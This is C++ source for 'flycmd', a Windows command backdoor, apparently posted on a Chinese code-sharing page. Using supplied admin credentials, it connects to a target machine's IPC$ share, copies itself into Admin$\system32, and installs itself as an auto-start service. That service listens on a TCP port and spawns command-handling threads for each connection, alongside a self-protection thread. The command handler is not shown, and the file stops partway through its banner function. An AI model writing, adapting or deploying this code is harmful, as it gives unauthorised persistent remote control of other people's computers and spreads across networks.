📄 cmdbackdoor.cpp
字号:
#include "cmdbackdoor.h"
int main(int argc, char* argv[])
{
SERVICE_TABLE_ENTRY ServiceTable[] = //服务线程入口表
{{szServiceName, (LPSERVICE_MAIN_FUNCTION)ServiceMain},{NULL, NULL}};
if(argc==5)
{
if(ConnectRemote(1,argv[2],argv[3],argv[4])==0) return -1;
if(!stricmp(argv[1],"-install")) InstallCmdService(argv[2]);
else if(!stricmp(argv[1],"-remove")) RemoveCmdService(argv[2]);
if(ConnectRemote(0,argv[2],argv[3],argv[4])==0) return -1;
return 0;
}
else if(argc==2)
{
if(!stricmp(argv[1],"-install")) InstallCmdService(NULL);
else if(!stricmp(argv[1],"-remove")) RemoveCmdService(NULL);
else
{
Start();
Usage(argv[0]);
}
return 0;
}
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
void ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{ // 注册服务控制处理函数
sshStatusHandle = RegisterServiceCtrlHandler(szServiceName,
(LPHANDLER_FUNCTION)ServiceCtrlHandler);
if (sshStatusHandle)
{ // 设置服务类型
ssStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
ssStatus.dwServiceSpecificExitCode = 0; // 出错代码
ssStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP
| SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStart(); // 运行服务
} /* else AddMessageToLog("RegisterServiceCtrlHandler failed! \n"); */
}
void ServiceCtrlHandler(DWORD dwCtrlCode)
{
switch (dwCtrlCode)
{
case SERVICE_CONTROL_STOP:
// 服务即将停止(注意在服务停止前应该先设置其状态为SERVICE_STOP_PENDING)
ReportStatusToSCMgr(SERVICE_STOP_PENDING, NO_ERROR, 5000);
// 停止服务代码
// ServiceStop();
// 服务已经停止(注意在服务停止后应该将其设置为SERVICE_STOPPED状态,否则下次无法启动服务)
ReportStatusToSCMgr(SERVICE_STOPPED, NO_ERROR, 0);
break;
/* case SERVICE_CONTROL_INTERROGATE:
break; */
default:
break;
}
}
void ServiceStart()
{
DWORD dwThreadId; // 即将开始运行服务(回送SERVICE_START_PENDING信息,服务即将运行)
ReportStatusToSCMgr(SERVICE_START_PENDING, NO_ERROR, 1000);
hStopEvent = CreateEvent(NULL, TRUE, FALSE, "stop");
if (hStopEvent == NULL) return;
ReportStatusToSCMgr(SERVICE_RUNNING, NO_ERROR, 0);
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&ServiceThread, NULL, NULL, &dwThreadId);
}
bool ReportStatusToSCMgr(DWORD dwCurrentState, DWORD dwExitCode, DWORD dwWaitHint)
{
static dwCheckPoint = 1;
if (dwCurrentState == SERVICE_START_PENDING) ssStatus.dwControlsAccepted = 0;// 服务正在运行,什么也不接受
else ssStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP; // 服务已经运行,接受停止
ssStatus.dwCurrentState = dwCurrentState; // 设置状态信息 &Rm}n
ssStatus.dwWin32ExitCode = dwExitCode;
ssStatus.dwWaitHint = dwWaitHint;
if ((ssStatus.dwCurrentState == SERVICE_RUNNING) ||
(ssStatus.dwCurrentState == SERVICE_STOPPED)) ssStatus.dwCheckPoint = 0;
else
ssStatus.dwCheckPoint = dwCheckPoint++;// 回送服务状态 dO:Q)
SetServiceStatus(sshStatusHandle, &ssStatus);
return true;
}
void ServiceThread(LPVOID lpParameter)
{
__try
{
WSADATA WSAData;
struct sockaddr_in RemoteAddr;
SOCKET ClientSocket,ServerSocket;
WSAStartup(MAKEWORD(2,2),&WSAData);
ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
RemoteAddr.sin_family = AF_INET;
RemoteAddr.sin_port = htons(atoi(PORT));
RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY;
bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr));
listen(ServerSocket, 5);
CreateThread(NULL,0,ProtectSelf,(LPVOID)NULL,0,NULL);
while(1)
{
ClientSocket = accept(ServerSocket, NULL, NULL);
CreateThread(NULL,0,ThreadGetCmd,(LPVOID)&ClientSocket,0,NULL);
Sleep(1000);
}
}
__finally {}
WSACleanup();
return ;
}
int ConnectRemote(int bConnect,char *lpHost,char *lpUserName,char *lpPassword)
{
char lpIPC[256];
DWORD dwErrorCode;
NETRESOURCE NetResource;
sprintf(lpIPC,"\\\\%s\\ipc$",lpHost);
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;
if(bConnect)
{
printf("Now Connecting ...... ");
while(1)
{
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
if((dwErrorCode==ERROR_ALREADY_ASSIGNED) || (dwErrorCode==ERROR_DEVICE_ALREADY_REMEMBERED))
WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
else if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
break;
}
else
{
printf("Failure !\n");
return FALSE;
}
Sleep(10);
}
}
else
{
printf("Now Disconnecting ... ");
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode==NO_ERROR) printf("Success !\n");
else
{
printf("Failure !\n");
return FALSE;
}
}
return 1;
}
void InstallCmdService(char *lpHost)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char *lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
if(lpHost==NULL)
{
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"\\");strcat(lpImagePath,EXENAME);
lpHostName=NULL;
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\%s",lpHost,EXENAME);
lpHostName=(char *)malloc(256);
sprintf(lpHostName,"\\\\%s",lpHost);
}
printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5) printf("Failure ... Access is Denied !\n");
else printf("Failure !\n");
return ;
}
else printf("Success !\n");
}
else
{
printf("Already Exists !\n");
FindClose(hSearch);
}
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if(schSCManager==NULL)
{
printf("Open Service Control Manager Database Failure !\n");
return ;
}
printf("Creating Service .... ");
schService=CreateService(schSCManager,
szServiceName,// 服务名
szServiceName,// 用于在服务管理器中显示的名称
SERVICE_ALL_ACCESS,// 访问权限
SERVICE_WIN32_OWN_PROCESS,// 服务类型
SERVICE_AUTO_START,// 启动类型
SERVICE_ERROR_IGNORE,// 启动失败的严重程度
lpImagePath,// 服务程序路径
NULL,// 服务组名
NULL,
NULL,// 启动服务前先启动的服务组
NULL,// 账号
NULL); // 密码
if(schService==NULL)
{
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
{
printf("Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf("Already Exists !\n");
schService=OpenService(schSCManager,szServiceName,SERVICE_START);
if(schService==NULL)
{
printf("Opening Service .... Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
}
}
else printf("Success !\n");
printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
printf("already Running !\n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
}
else printf("Pending ... ");
while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
{
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING) Sleep(100);
else break;
}
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)printf("Failure !\n");
else printf("Success !\n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
void RemoveCmdService(char *lpHost)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpImagePath[MAX_PATH];
char *lpHostName;
WIN32_FIND_DATA FileData;
SERVICE_STATUS RemoveServiceStatus;
HANDLE hSearch;
DWORD dwErrorCode;
if(lpHost==NULL)
{
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"\\");strcat(lpImagePath,EXENAME);
lpHostName=NULL;
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\%s",lpHost,EXENAME);
lpHostName=(char *)malloc(MAX_PATH);
sprintf(lpHostName,"\\\\%s",lpHost);
}
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if(schSCManager==NULL)
{
printf("Opening SCM ......... ");
dwErrorCode=GetLastError();
if(dwErrorCode!=5) printf("Failure !\n");
else printf("Failuer ... Access is Denied !\n");
return ;
}
schService=OpenService(schSCManager,szServiceName,SERVICE_ALL_ACCESS);
if(schService==NULL)
{
printf("Opening Service ..... ");
dwErrorCode=GetLastError();
if(dwErrorCode==1060) printf("no Exists !\n");
else printf("Failure !\n");
CloseServiceHandle(schSCManager);
}
else
{
printf("Stopping Service .... ");
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED) printf("already Stopped !\n");
else
{
printf("Pending ... ");
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED) printf("Success !\n");
else printf("Failure !\n");
}
else printf("Failure !\n");
} }
else printf("Query Failure !\n");
printf("Removing Service .... ");
if(DeleteService(schService)==0) printf("Failure !\n");
else printf("Success !\n");
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf("Removing File ....... ");
Sleep(1500);
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE) printf("no Exists !\n");
else
{ if(DeleteFile(lpImagePath)==0) printf("Failure !\n");
else printf("Success !\n");
FindClose(hSearch);
}
return ;
}
void Start()
{
printf("\r\t*******************************************\n\r\t|-----[ flycmd v1.0 beta , by qfsl ]------|\n\r\t|-----[ E-mail: qfsl@163.net ]------|\n\r\t|-----[ HomePage: qfsl.51.net ]------|\n\r\t|-----[ Date: 02-04-2005 ]------|\n\r\t*******************************************\n\r");
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -